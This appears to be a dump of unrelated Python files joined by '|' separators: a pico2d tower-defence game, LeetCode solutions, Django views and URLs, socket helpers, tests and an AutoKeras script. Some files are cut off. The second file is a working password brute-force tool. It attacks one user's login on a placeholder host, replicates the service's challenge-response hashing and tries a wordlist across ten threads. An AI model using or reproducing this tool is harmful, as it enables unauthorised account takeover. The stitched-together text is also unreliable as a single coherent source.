s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(server):
port = socket.htons(port)
s.bind((host, port))
else:
addrinfo = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM)
family, socktype, proto, canonname, sockaddr = addrinfo[0]
ip, port = sockaddr
port = socket.htons(port)
s.connect((ip, port))
return s
def SendMessage(sock, message):
message = str(message + '\n')
try :
sock.sendall(message) #Send the whole string
except socket.error:
print('Message failed to send') #Send failed
sys.exit()
return
# readlines function from Dr.Fyre's sumPython example
# pulled from https://synack.me/blog/using-python-tcp-sockets
# retrieved 11/15/2020
# renamed to RecvMessage for group use
def RecvMessage(sock, recv_buffer=4096, delim='\n'):
buffer = ''
data = True
while data:
data = sock.recv(recv_buffer)
buffer += data
while buffer.find(delim) != -1:
line, buffer = buffer.split('\n', 1)
yield line
return
def ClientClose(sock):
SendMessage(sock, 'BYE')
sock.close()
return
|
# Description
# Bruteforces the password of an given username, with a wordlist
# Parameters
# Parameter 1: Username
# Parameter 2: Wordlist
# Additional
# Replace [Host] with the host
import sys
import requests
import hashlib
import signal
import json
from collections import namedtuple
from os import system
import re
from multiprocessing.dummy import Pool
def signal_handler(signal, frame):
print('Quiting')
sys.exit(0)
def login(loginID, password, getCookie = False):
#get challenge
try:
r = requests.get('https://[Host]/Services/Security.asmx/InitializeLogin?loginid=%s' % loginID)
except:
return login(loginID, password, getCookie)
s = r.content
s = s[s.index('{'):s.index('}') + 1]
x = json.loads(s, object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))
#hash password with challenge
hash_dig = password
try:
for i in range(0, x.iterations):
hash_dig = hashlib.sha256(hash_dig + x.salt + password).hexdigest()
hash_dig = hashlib.sha256(hash_dig + x.challenge).hexdigest()
except:
print "[!] Error on loginID",loginID
return False
try:
login = requests.get('https://[Host]/Services/Security.asmx/Login?response=%s' % hash_dig, cookies=r.cookies)
except:
return login(loginID, password, getCookie)
if getCookie:
return r.cookies
return "true" in login.content
def loginThread(password):
username = sys.argv[1]
if login(username, password):
print '[+] {0} with password {1} \n'.format(username, password),
exitPls
exit(1)
print "[*] Trying the passwords from {0} on the user {1}".format(str(sys.argv[2]), str(sys.argv[1]))
passwords = [line.rstrip('\n') for line in open(str(sys.argv[2]))]
signal.signal(signal.SIGINT, signal_handler)
pool = Pool(10)
asyncres = pool.map(loginThread, passwords)
pool.close()
pool.join()
|
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'^$', 'intent.apps.core.views.home', name='home'),
url(r'^login/$', 'django.contrib.auth.views.login',
{'template_name': 'core/login.html'}, name='login'),
url(r'^register/$', 'intent.apps.core.views.register', name='register'),
url(r'^logout/$', 'intent.apps.core.views.logout_user', name='logout'),
url(r'^plans/$', 'intent.apps.core.views.plans', name='plans'),
url(r'^terms/$', 'intent.apps.core.views.terms', name='terms'),
url(r'^technology/$', 'intent.apps.core.views.technology', name='technology'),
url(r'^privacy/$', 'intent.apps.core.views.privacy', name='privacy'),
url(r'^company/$', 'intent.apps.core.views.company', name='company'),
)
|
import random
import json
import os
from pico2d import *
import GameWin
import game_framework
import title_state
import GameOver
import Sound_Manager
name = "MainState2"
class Field:
img = None
def __init__(self,x,y,state):
self.x = x
self.y = y
self.state = state
if Field.img == None:
Field.image1 = load_image('Graphics\\Fire_map.png')
Field.image2 = load_image('Graphics\\Road_2.png')
def draw(self):
if self.state == 1:
self.image1.draw(self.x, self.y)
else:
self.image2.draw(self.x,self.y)
def Change(self,state): #바닥의 상태를 바꿔준다.
self.state = state
def ReturnState(self):
return self.state
class Home:
hpimage1 = None
hpimage2 = None
image = None
def __init__(self):
self.hp = 1000
self.x = 650
self.y = 400
if Home.hpimage1 == None:
Home.hpimage1 = load_image ('Graphics\\healthStatusBar.png')
Home.hpimage2 = load_image ('Graphics\\healthStatusBar1.png')
if Home.image == None:
Home.image = load_image('Graphics\\home.PNG')
def update(self):
for M in monsterSet:
if M.attack==True and M.attackframe>7 and math.sqrt((M.x-self.x)*(M.x-self.x)+(M.y-self.y)*(M.y-self.y))<50 and M.death==False:
self.hp-=5
if self.hp<0:
game_framework.change_state(GameOver)
def draw(self):
self.hpimage2.draw (self.x, self.y + 100, 100, 20)
self.hpimage1.draw (self.x + (100 - self.hp / 10) / 2, self.y + 100, self.hp / 10, 20)
self.image.draw(self.x,self.y,150,150)
class Monster:
image = None
attackImage =None
RIGHT_RUN,UP_RUN, DOWN_RUN = 1,0,3
def __init__(self,state):
self.hp = 0
self.state = state
self.damage = 3
self.attack = False
self.frame = 0
self.attackframe=0
self.attackspeed = 10
self.speed = 100
self.framespeed=10
self.x,self.y =25,275
self.death= False
self.dir =0
self.bloodtime=0
self.bloodspeed = 10
self.movestate = self.RIGHT_RUN
if self.state == 0:
self.hp = 100
self.image=load_image('Graphics\\pig.png')
self.attackImage = load_image('Graphics\\Monster_attack2.png')
elif self.state == 1:
self.hp = 150
self.image =load_image('Graphics\\trash.png')
self.attackImage = load_image('Graphics\\Monster_attack1.png')
elif self.state == 2:
self.hp = 200
self.image =load_image('Graphics\\nohead.png')
self.attackImage = load_image('Graphics\\Monster_attack.png')
def update(self,frame_time):
if self.death==False:
if character.skillstate == 1 and character.skillGo == True and math.sqrt((character.m_x-self.x)*(character.m_x-self.x)+(character.m_y-self.y)*(character.m_y-self.y))<100\
and character.skillframe>6:
self.hp -= 50
if character.skillstate == 2 and character.skillGo == True and math.sqrt((character.m_x-self.x)*(character.m_x-self.x)+(character.m_y-self.y)*(character.m_y-self.y))<100:
self.speed = 50
self.damage = 1
else:
self.speed = 100
self.damage = 5
if(self.attack==True):
self.attackframe += self.attackspeed*frame_time
if (self.attackframe > 10):
self.attackframe = 0
self.attack = False
if math.sqrt((self.x-character.x)*(self.x-character.x)+(self.y-character.y)*(self.y-character.y))<50 or \
math.sqrt((self.x-home.x)*(self.x-home.x)+(self.y-home.y)*(self.y-home.y))<50:
self.attack=True
else:
self.attack=False
if self.attack==False:
self.frame = (self.frame + self.framespeed*frame_time) % 4
if(self.movestate==self.RIGHT_RUN):
self.x+=self.speed*frame_time
if(self.movestate==self.UP_RUN):
self.y+=self.speed*frame_time
if(self.movestate==self.DOWN_RUN):
self.y-=self.speed*frame_time
if(self.movestate==self.RIGHT_RUN and FieldSet[int((self.x-25)/50)+1][int((self.y-25)/50)].state==1):
if(FieldSet[int((self.x-25)/50)][int((self.y-25)/50)+1].state==1):
self.movestate = self.DOWN_RUN
elif(FieldSet[int((self.x-25)/50)][int((self.y-25)/50)-1].state==1):
self.movestate = self.UP_RUN
elif(self.movestate==self.DOWN_RUN and FieldSet[int((self.x-25)/50)][int((self.y-25)/50)-1].state==1):
self.movestate = self.RIGHT_RUN
elif(self.movestate==self.UP_RUN and FieldSet[int((self.x-25)/50)][int((self.y-25)/50)+1].state==1):
self.movestate = self.RIGHT_RUN
else:
pass
if math.sqrt((self.x-character.x)*(self.x-character.x)+(self.y-character.y)*(self.y-character.y))<50:
if character.attackdir==3 and character.attack==True and character.attackframe>2:
if (FieldSet[int ((self.x - 25) / 50)+1][int ((self.y - 25) / 50)].state == 0):
self.hp-= character.damage
elif character.attackdir==1 and character.attack==True and character.attackframe>2:
if (FieldSet[int ((self.x - 25) / 50)][int ((self.y - 25) / 50)].state == 0):
self.hp -= character.damage
elif character.attackdir== 2 and character.attack==True and character.attackframe>2:
if (FieldSet[int ((self.x - 25) / 50)][int ((self.y - 25) / 50)+1].state == 0):
self.hp -= character.damage
elif character.attackdir == 0 and character.attack==True and character.attackframe>2:
if (FieldSet[int ((self.x - 25) / 50)][int ((self.y - 25) / 50)].state == 0):
self.hp -= character.damage
else:
pass
if self.hp<0 and self.death==False:
character.money += 30
if self.hp<0:
self.bloodtime+=self.bloodspeed*frame_time
self.death = True
def draw(self):
if self.death==False:
self.image.clip_draw (int(self.frame) * 50, self.movestate* 50, 50, 50, self.x, self.y, 50, 50)
if self.attack==True:
self.attackImage.clip_draw(int(self.attackframe)*50,0,50,50,self.x,self.y)
else:
self.image = load_image('Graphics\\Blood.png')
self.image.opacify(1-self.bloodtime/50)
self.image.draw(self.x,self.y)
if(self.bloodtime>50):
monsterSet.remove(self)
class Character:
global monsterSet
global turret
buffOnimage = None
image = None
hpimage1 = None
hpimage2 = None
attackimage = None
attack = False
ringimage = None
SkillImage1 = None
SkillImage2 = None
cursorimage = None
buffimage = None
LEFT_RUN,LEFT_STAND, RIGHT_RUN, RIGHT_STAND,UP_RUN,UP_STAND,DOWN_RUN,DOWN_STAND = 2,6,1,5,0,4,3,7 #STAND = GO_STATE+4
def __init__(self):
self.m_x,self.m_y = 0,0
self.x, self.y = 625,300
self.skillstate = 0
self.skillframe= 0
self.icetime=0
self.buffOn = False
self.money = 0
self.buffTime = 0
self.buffcoolTime = 0
self.buffOn1 = False
self.skillGo=False #스킬시전
self.skillcoolOn1 = True
self.skillcoolOn2 = True
self.damage = 5
self.ringOn = False
self.hp = 1000
self.frame = 0
self.attackdir = 0
self.cool1 = False
self.buffframe = 0
self.skillcooltime1 = 0
self.cool2 = False
self.skillcooltime2 = 0
self.turretOn = False
self.skillcoolOn_speed = 20
self.skillice_frame = 20
self.attackframe=0
self.buff_frame_speed = 30
self.skillframe_speed = 20
self.move_speed = 100
self.attack_speed = 30
self.move_frame_speed = 10
self.tron = False
self.state = self.DOWN_STAND
if Character.image == None:
Character.buffimage = load_image('Graphics\\buff.png')
Character.ringimage = load_image('Graphics\\SkillRing.png')
Character.image = load_image ('Graphics\\Character.png')
Character.attackimage = load_image('Graphics\\attack.png')
Character.hpimage1 =load_image('Graphics\\healthStatusBar.png')
Character.hpimage2 =load_image('Graphics\\healthStatusBar1.png')
Character.SkillImage1 = load_image('Graphics\\Ice_field.png')
Character.SkillImage2 = load_image ('Graphics\\bomb.png')
Character.cursorimage = load_image('Graphics\\cursor.png')
Character.buffOnimage = load_image('Graphics\\BUFF_ON.png')
def handle_event(self, event):
if event.type == SDL_MOUSEMOTION and self.ringOn==True and self.skillGo==False:
self.m_x, self.m_y = event.x, 700 - event.y
if event.type == SDL_MOUSEBUTTONDOWN and self.skillstate==1 and self.skillGo==False \
and math.sqrt((self.x-self.m_x)*(self.x-self.m_x)+(self.y-self.m_y)*(self.y-self.m_y))<150 and self.cool1 == False and self.tron==False:
Sound_Manager.PlayEffectSound('Explosion')
self.skillGo = True
self.cool1 = True
self.skillcoolOn1 = False
elif event.type == SDL_MOUSEBUTTONDOWN and self.skillstate==2 and self.skillGo==False \
and math.sqrt ((self.x - self.m_x) * (self.x - self.m_x) + (self.y - self.m_y) * (self.y - self.m_y))< 150 and self.cool2 == False and self.tron==False:
Sound_Manager.PlayEffectSound('Ice_Field')
self.skillGo = True
self.cool2 = True
self.skillcoolOn2 = False
elif event.type == SDL_MOUSEBUTTONDOWN and self.turretOn==False and FieldSet[int(self.m_x/50)][int(self.m_y/50)].state==1 \
and math.sqrt ((self.x - self.m_x) * (self.x - self.m_x) + (self.y - self.m_y) * (
self.y - self.m_y)) < 150:
Sound_Manager.PlayEffectSound('Make_Turret')
self.turret = Turret(int(self.m_x/50),int(self.m_y/50))
self.money-=350
self.turretOn = True
if (event.type, event.key) == (SDL_KEYDOWN, SDLK_1) and self.skillGo==False and self.skillcoolOn1==True :
self.ringOn = True
self.skillstate = 1
elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_2) and self.skillGo==False and self.skillcoolOn2==True :
self.ringOn = True
self.skillstate = 2
elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_3) and self.buffOn == False:
Sound_Manager.PlayEffectSound('Buff_sound')
self.buffOn = True
self.buffOn1 = True
elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_4) and self.turretOn ==False and self.money>350:
self.tron = True
self.ringOn=True
elif (event.type, event.key) == (SDL_KEYUP, SDLK_1):
self.ringOn = False
elif (event.type, event.key) == (SDL_KEYUP, SDLK_2):
self.ringOn = False
elif (event.type, event.key) == (SDL_KEYUP, SDLK_4):
self.tron = False
self.ringOn = False
if (event.type, event.key) == (SDL_KEYDOWN, SDLK_a):
self.attackdir = 1
if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
self.state = self.LEFT_RUN
elif self.state in (self.RIGHT_RUN,self.UP_RUN,self.DOWN_RUN):
self.state = self.LEFT_RUN
elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_d):
self.attackdir = 3
if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
self.state = self.RIGHT_RUN
elif self.state in (self.LEFT_RUN,self.UP_RUN,self.DOWN_RUN):
self.state = self.RIGHT_RUN
elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_w):
self.attackdir = 2
if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
self.state = self.UP_RUN
elif self.state in (self.RIGHT_RUN,self.LEFT_RUN,self.DOWN_RUN):
self.state = self.UP_RUN
elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_s):
self.attackdir = 0
if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
self.state = self.DOWN_RUN
elif self.state in (self.LEFT_RUN,self.UP_RUN,self.RIGHT_RUN):
self.state = self.DOWN_RUN
elif (event.type, event.key) == (SDL_KEYUP, SDLK_a):
if self.state in (self.LEFT_RUN,):
self.state = self.LEFT_STAND
elif (event.type, event.key) == (SDL_KEYUP, SDLK_d):
if self.state in (self.RIGHT_RUN,):
self.state = self.RIGHT_STAND
elif (event.type, event.key) == (SDL_KEYUP, SDLK_w):
if self.state in (self.UP_RUN,):
self.state = self.UP_STAND
elif (event.type, event.key) == (SDL_KEYUP, SDLK_s):
if self.state in (self.DOWN_RUN,):
self.state = self.DOWN_STAND
if (event.type,event.key)==(SDL_KEYDOWN,SDLK_SPACE):
Sound_Manager.PlayEffectSound('Strike')
self.attack = True
def update(self,frame_time): #소수점이후로 다 버려버림..
global FieldSet
if self.turretOn==True:
self.turret.update(frame_time)
if self.buffOn == True:
self.buffcoolTime += frame_time*self.skillcoolOn_speed
self.buffTime += frame_time*self.skillcoolOn_speed
self.buffframe += frame_time
if (self.buffcoolTime > 300): #버프스킬 쿨타임 = 300초
self.buffOn = False
self.buffcoolTime = 0
self.buffframe = 0
self.buffTime=0
if (self.buffTime > 150):
self.damage = 5
self.buffOn1 = False
elif (self.buffTime<150):
self.damage = 15
if(self.cool1==True):
self.skillcooltime1+= frame_time*self.skillcoolOn_speed
if(self.skillcooltime1>150): #폭발스킬 쿨타임 150초
self.cool1 = False
self.skillcoolOn1=True
self.skillcooltime1=0
if(self.cool2==True):
self.skillcooltime2+= frame_time*self.skillcoolOn_speed
if(self.skillcooltime2>150): # 아이스필드스킬 쿨타임 150초
self.skillcoolOn2=True
self.cool2 = False
self.skillcooltime2=0
if(self.attack==True):
self.attackframe += frame_time*self.attack_speed
if (self.attackframe > 3):
self.attackframe = 0
self.attack = False
if self.state < self.DOWN_RUN+1:
self.frame = (self.frame+self.move_frame_speed*frame_time)%4
if self.state == self.RIGHT_RUN:
if FieldSet[int((self.x-25)/50)+1][int((self.y-25)/50)].state==0 :
self.x = min (700, self.x + frame_time*self.move_speed)
elif self.state == self.LEFT_RUN:
if FieldSet[int((self.x-25)/50)][int((self.y-25)/50)].state==0 :
self.x = max (0, self.x - frame_time*self.move_speed)
elif self.state == self.UP_RUN:
if FieldSet[int((self.x-25)/50)][int((self.y-25)/50)+1].state==0 :
self.y = min (700, self.y + frame_time*self.move_speed)
elif self.state == self.DOWN_RUN:
if FieldSet[int((self.x-25)/50)][int((self.y-25)/50)].state==0 :
self.y = max (0, self.y - frame_time*self.move_speed)
for M in monsterSet:
if M.attack==True and M.attackframe>7 and math.sqrt((M.x-self.x)*(M.x-self.x)+(M.y-self.y)*(M.y-self.y))<50 and M.death==False:
self.hp-=M.damage
if self.skillstate==1 and self.skillGo==True:
self.skillframe+=self.skillframe_speed*frame_time
if(self.skillframe>8):
self.skillframe=0
self.skillGo=False
if self.skillstate==2 and self.skillGo==True:
self.skillframe=(self.skillframe+self.skillframe_speed*frame_time)%8
self.icetime+=self.skillice_frame*frame_time
if(self.icetime>50): # 아이스필드 스킬 시전시간
self.skillframe=0
self.icetime=0
self.skillGo=False
if self.hp<0:
game_framework.change_state(GameOver)
def draw(self):
if self.buffOn1==True:
self.buffOnimage.draw(500,650)
if self.turretOn == True:
self.turret.draw()
if self.ringOn==True:
self.ringimage.draw(self.x,self.y)
self.cursorimage.draw(self.m_x,self.m_y)
self.hpimage2.draw (self.x, self.y + 30, 50, 20)
self.hpimage1.draw (self.x + (50 - self.hp/20)/2, self.y + 30, self.hp/20, 20)
if self.attack==False:
if(self.state<4):
self.image.clip_draw (int(self.frame) * 50, self.state * 50, 50, 50, self.x, self.y,50,50)
else:
self.image.clip_draw (int(self.frame)* 50, int(self.state-4) * 50, 50, 50, self.x, self.y,50,50)
else:
self.attackimage.clip_draw (self.attackdir*50, int(self.attackframe) * 50, 50, 50, self.x, self.y, 50, 50) # up
if self.skillstate==1 and self.skillGo==True:
self.SkillImage2.clip_draw(int(self.skillframe)%8 * 200, 0, 200, 200, self.m_x, self.m_y)
if self.skillstate==2 and self.skillGo==True:
self.SkillImage1.clip_draw(int(self.skillframe)%8 * 200, 0, 200, 200, self.m_x, self.m_y)
if self.buffOn==True and self.buffframe<10:
self.buffimage.clip_draw(int(self.buffframe*self.buff_frame_speed)*100,0,100,100,self.x,self.y+20)
class Turret:
global missile
image = None
missile = []
def __init__(self,x,y):
self.frame = 0
self.x,self.y = x,y
self.launchTime = 0
self.frameSpeed = 20
if Turret.image==None:
self.image = load_image('Graphics\\Turret.png')
def update(self,frame_time):
self.launchTime +=1
self.frame = (self.frame+frame_time*self.frameSpeed)%25
if(self.launchTime%1000==0):
missile.append(Missile (self.x*50+25,self.y*50+25,0))
missile.append (Missile (self.x*50+25, self.y*50+25, 1))
missile.append (Missile (self.x*50+25, self.y*50+25, 2))
missile.append (Missile (self.x*50+25, self.y*50+25, 3))
for M in missile:
M.update(frame_time)
def draw(self):
self.image.clip_draw(int(self.frame)*80,0,80,80,self.x*50+25,self.y*50+25,50,50)
for M in missile:
M.draw()
class Missile:
image = None
image_Explode =None
global monsterSet
global missile
def __init__(self,x,y,dir):
self.frame = 0
self.x,self.y = x,y
self.speed = 200
self.explodeframe = 0
self.explodespeed = 20
self.explode = False
self.dir = dir
self.remove = False
if Missile.image==None:
self.image = load_image ('Graphics\\Missile.png')
self.image_Explode = load_image('Graphics\\MissileExplode.png')
def update(self,frame_time):
self.frame = (self.frame+frame_time*self.speed)%4
if self.explode==False:
if self.dir==0:
self.x+=frame_time*self.speed
elif self.dir==1:
self.x-=frame_time*self.speed
elif self.dir==2:
self.y+=frame_time*self.speed
elif self.dir==3:
self.y-=frame_time*self.speed
if self.explode==True:
self.explodeframe+=frame_time*self.explodespeed
if (self.x > 1000 or self.x < -100 or self.y < -100 or self.y > 1000) and self.remove==False:
missile.remove (self)
self.remove=True
else:
for M in monsterSet:
if (math.sqrt ((self.x - M.x) * (self.x - M.x) + (self.y - M.y) * (
self.y - M.y)) < 25) and self.remove==False and M.death==False:
self.explode=True
if self.explodeframe>5:
missile.remove(self)
self.remove=True
M.hp -= 10
def draw(self):
if (self.explode==True):
self.image_Explode.clip_draw(int(self.explodeframe)*100,0,100,100,self.x,self.y)
else:
self.image.clip_draw (int(self.frame) * 50, 0, 50, 50, self.x, self.y, 50, 50)
class FireBall:
global FireballSet
image = None
def __init__(self,x,y):
self.x,self.y = x,y
self.speed = 200
self.framespeed = 100
self.frame=0
self.remove = False
if FireBall.image==None:
FireBall.image = load_image('Graphics\\Fire_Ball.png')
def draw(self):
self.image.clip_draw (int (self.frame) * 50, 0, 50, 50, self.x, self.y, 50, 50)
def update(self,frame_time):
self.frame = (self.frame+frame_time*self.framespeed)%3
self.x+=frame_time*self.speed
if self.x>1000 and self.remove==False:
self.remove=True
FireballSet.remove(self)
if math.sqrt((character.x-self.x)*(character.x-self.x)+(character.y-self.y)*(character.y-self.y))<25 and self.remove==False:
character.hp-=30
self.remove=True
FireballSet.remove(self)
if math.sqrt((home.x-self.x)*(home.x-self.x)+(home.y-self.y)*(home.y-self.y))<50 and self.remove==False:
home.hp-=50
self.remove=True
FireballSet.remove(self)
class UI:
font = None
image = None
image_BOMB_UI = None
image_ICE_UI = None
image_BUFF_UI = None
image_BOMB_CLOSE_UI = None
image_ICE_CLOSE_UI = None
image_BUFF_CLOSE_UI = None
image_Turret_UI = None
image_Turret_CLOSE_UI = None
def __init__(self):
self.x = 0
self.y = 0
UI.font = load_font('hjbmb.ttf')
if self.image==None:
self.image_BOMB_UI = load_image('Graphics\\Fire_UI.png')
self.image_ICE_UI = load_image('Graphics\\ICE_UI.png')
self.image_BUFF_UI = load_image('Graphics\\Buff_UI.png')
self.image_BOMB_CLOSE_UI = load_image('Graphics\\FIRE_CLOSE_UI.png')
self.image_ICE_CLOSE_UI = load_image('Graphics\\ICE_CLOSE_UI.png')
self.image_BUFF_CLOSE_UI = load_image('Graphics\\BUFF_CLOSE_UI.png')
self.image_Turret_CLOSE_UI = load_image('Graphics\\TURRET_CLOSE_UI.png')
self.image_Turret_UI = load_image('Graphics\\Turret_UI.png')
def draw(self):
UI.font.draw(500,600,'Money:%d'%character.money,(100,0,0))
self.image_BUFF_UI.draw(300,650)
self.image_ICE_UI.draw(200,650)
self.image_BOMB_UI.draw(100,650)
self.image_Turret_UI.draw(400,650)
if character.skillcoolOn1==False:
self.image_BOMB_CLOSE_UI.draw(100,650)
if character.skillcoolOn2==False:
self.image_ICE_CLOSE_UI.draw(200,650)
if character.buffOn==True:
self.image_BUFF_CLOSE_UI.draw(300,650)
if character.turretOn==True or character.money<350:
self.image_Turret_CLOSE_UI.draw(400,650)
def update(self):
pass
def enter():
global Bgm
global FieldSet
global character
global home
global monster
global cursorimage
global MakeTime
global monsterSet
global monster_level
global stageimage1
global stageimage2
global stageimage3
global cursorMove
global ui
global FireballSet
global current_time
global FIreball_time
Sound_Manager.LoadSoundData()
Bgm = load_wav('Sound\\HellMode.wav')
Bgm.set_volume(8)
Bgm.repeat_play()
current_time = get_time()
ui = UI()
cursorMove = False
stageimage1 = load_image('Graphics\\Stage1.png')
stageimage2 = load_image ('Graphics\\Stage2.png')
stageimage3 = load_image ('Graphics\\Stage3.png')
cursorimage = load_image('Graphics\\cursor.png')
monster_level = 0
home = Home()
character = Character()
monsterSet=[]
FireballSet = []
monster = Monster(0)
MakeTime = 0
FIreball_time = 0
FieldSet = [[0 for col in range(14)] for row in range(14)]
for y in range (0, 14):
for x in range (0, 14):
FieldSet[y][x]=Field(y * 50 + 25, x * 50 + 25, 1)
Field.Change (FieldSet[5][2], 0)
Field.Change (FieldSet[4][2], 0)
Field.Change (FieldSet[10][2], 0)
Field.Change (FieldSet[11][2], 0)
for i in range(0,3):
Field.Change(FieldSet[i][5],0)
for i in range(0,4):
Field.Change(FieldSet[3][5-i],0)
for i in range(0,3):
Field.Change(FieldSet[3+i][1],0)
for i in range(1,8):
Field.Change(FieldSet[6][i],0)
for i in range(0,3):
Field.Change(FieldSet[6+i][8],0)
for i in range(0,7):
Field.Change(FieldSet[9][8-i],0)
for i in range(0,4):
Field.Change(FieldSet[9+i][1],0)
for i in range(0,7):
Field.Change(FieldSet[12][1+i],0)
def exit():
global Bgm
del(Bgm)
def pause():
global Bgm
del(Bgm)
def resume():
pass
running = True
def handle_events():
global character
global running
events = get_events()
for event in events:
if event.type == SDL_QUIT:
running = False
elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:
running = False
else:
character.handle_event(event)
def get_frame_time():
global current_time
frame_time = get_time() - current_time
current_time += frame_time
return frame_time
def update():
global running
global MakeTime
global monsterSet
global monster_level
global home
global FireballSet
global FIreball_time
MakeTime +=1
frame_time = get_frame_time()
FIreball_time +=100*frame_time
print(FIreball_time)
if(FIreball_time>100):
FireballSet.append (FireBall (0, random.randint (1, 10) * 50 + 25))
FIreball_time=0
if monster_level<3:
if(MakeTime<3000):
if(MakeTime%250==1):
monsterSet.append(Monster(monster_level))
if (len (monsterSet) == 0):
monster_level +=1
MakeTime=0
else:
game_framework.change_state(GameWin)
for M in monsterSet:
M.update(frame_time)
for F in FireballSet:
F.update(frame_time)
home.update()
character.update(frame_time)
if not running:
game_framework.change_state(title_state)
running=True
def draw():
global ui
global FieldSet
global monster_level
global monsterSet
global stageimage1
global stageimage2
global stageimage3
global FireballSet
clear_canvas()
for y in range(0,14):
for x in range (0, 14):
FieldSet[y][x].draw()
if (monster_level == 0):
stageimage1.draw (600, 650)
elif (monster_level == 1):
stageimage2.draw (600, 650)
elif (monster_level == 2):
stageimage3.draw (600, 650)
ui.draw()
home.draw()
for M in monsterSet:
M.draw()
for F in FireballSet:
F.draw()
character.draw()
update_canvas() |
# 119. Pascal's Triangle II
#
# Given an index k, return the kth row of the Pascal's triangle.
#
# For example, given k = 3,
# Return [1,3,3,1].
class Solution(object):
def getRow(self, rowIndex):
"""
:type rowIndex: int
:rtype: List[int]
"""
result = []
if rowIndex == 0:
return [1]
for i in range(rowIndex+1):
temp = [1 for x in range(i + 1)]
result.append(temp)
for j in range(1, i + 1):
if j != 0 and j != i:
result[i][j] = result[i - 1][j - 1] + result[i - 1][j]
return result[rowIndex]
if __name__ == '__main__':
sol = Solution()
assert sol.getRow(3) == [1,3,3,1]
assert sol.getRow(0) == [1] |
import numpy as np
import tensorflow as tf
import autokeras as ak
from tensorflow.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 28, 28, 1).astype('float32') / 256.
x_test = x_test.reshape(10000, 28, 28, 1).astype('float32') / 256.
from tensorflow.keras.utils import to_categorical
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
model = ak.ImageClassifier(
# overwrite=True,
max_trials=2
)
model.fit(x_train, y_train, epochs=3)
results = model.evaluate(x_test, y_test)
print(results)
|
N = int(input())
A = [int(input()) for i in range(N)]
flag = False
i = 0
for j in range(1,11):
for k in A:
if k%(10**j) == 0:
pass
else:
print(i)
flag = True
break
if flag == True:
break
i += 1
|
import unittest
import os
from ..BaseTestCase import BaseTestCase
from centipede.ExpressionEvaluator import ExpressionEvaluator
from centipede.ExpressionEvaluator import ExpressionNotFoundError
class PathTest(BaseTestCase):
"""Test Path expressions."""
__path = "/test/path/example.ext"
__testRFindPath = os.path.join(BaseTestCase.dataDirectory(), 'config', 'test.json')
def testDirname(self):
"""
Test that the dirname expression works properly.
"""
result = ExpressionEvaluator.run("dirname", self.__path)
self.assertEqual(result, "/test/path")
def testParentDirname(self):
"""
Test that the parentdirname expression works properly.
"""
result = ExpressionEvaluator.run("parentdirname", self.__path)
self.assertEqual(result, "/test")
def testBasename(self):
"""
Test that the basename expression works properly.
"""
result = ExpressionEvaluator.run("basename", self.__path)
self.assertEqual(result, "example.ext")
def testRFindPath(self):
"""
Test that the rfind expression works properly.
"""
result = ExpressionEvaluator.run('rfindpath', 'test.txt', self.__testRFindPath)
testPath = os.path.join(BaseTestCase.dataDirectory(), 'test.txt')
self.assertEqual(result, testPath)
def testFindPath(self):
"""
Test that the find expression works properly.
"""
result = ExpressionEvaluator.run("findpath", 'TestCrawler.py', BaseTestCase.dataDirectory())
testPath = os.path.join(BaseTestCase.dataDirectory(), 'config', 'crawlers', 'TestCrawler.py')
self.assertEqual(result, testPath)
def testRegistration(self):
"""
Test that the expression registration works properly.
"""
def myDummyExpression(a, b):
return '{}-{}'.format(a, b)
self.assertRaises(ExpressionNotFoundError, ExpressionEvaluator.run, "dummy")
ExpressionEvaluator.register("dummy", myDummyExpression)
self.assertIn("dummy", ExpressionEvaluator.registeredNames())
def testParseRun(self):
"""
Test that running an expression through string parsing works.
"""
result = ExpressionEvaluator.parseRun("dirname {}".format(self.__path))
self.assertEqual(result, "/test/path")
self.assertRaises(AssertionError, ExpressionEvaluator.parseRun, True)
if __name__ == "__main__":
unittest.main()
|
from django.contrib.admin.models import LogEntry
from rest_framework.views import APIView
from rest_framework.response import Response
from .serializers import LogsSerializer, LogEntrySerializer
from .models import *
class WeavedinLogsView(APIView):
allowed_methods = ['GET']
serializer_class = LogsSerializer
def get_object(self, request, user_id):
try:
return Item.objects.get(user=user_id)
except Item.DoesNotExist:
raise Http404
def get(self, request, user_id=None):
start_time = request.query_params.get('start_time', None)
end_time = request.query_params.get('end_time', None)
if start_time:
log_entry = LogEntry.objects.filter(action_time__gte=start_time)
if end_time:
log_entry = LogEntry.objects.filter(action_time__lte=end_time)
if user_id:
items = Item.objects.filter(user=user_id)
else:
items = Item.objects.all()
response = []
for item in items:
item_data = LogsSerializer(item).data
logentires = log_entry.filter(object_id=item.id)
log_data = LogEntrySerializer(logentires, many=True).data
item_data['history'] = log_data
variants = item.variant_set.all()
for variant in variants:
variantentries = log_entry.filter(object_id=variant.id)
variant_data = LogEntrySerializer(variantentries, many=True).data
item_data['variant_history'] = variant_data
response.append(item_data)
return Response(response)
|
class Solution(object):
def evalRPN(self, tokens):
"""
:type tokens: List[str]
:rtype: int
"""
stack = []
for x in tokens:
try:
number = int(x)
except:
number = None
if number is not None:
stack.append(number)
else:
r = stack.pop()
l = stack.pop()
if x == '+':
stack.append(l+r)
elif x == '-':
stack.append(l-r)
elif x == '*':
stack.append(l*r)
else: # x == '/'
assert x == '/'
# Note that the int float stuff is needed to pass leetcode's tests
stack.append(int(float(l)/r))
assert len(stack) == 1
return stack[0]
|
import time
import shared_library
from hw1_naive_bayes import NaiveBayesClassifier
# Set constants
iv_count = 6 # Number of features in data set
validation_count = 10
prefix = "../datafiles/hw4_" # Used if data files are not in same directory as code
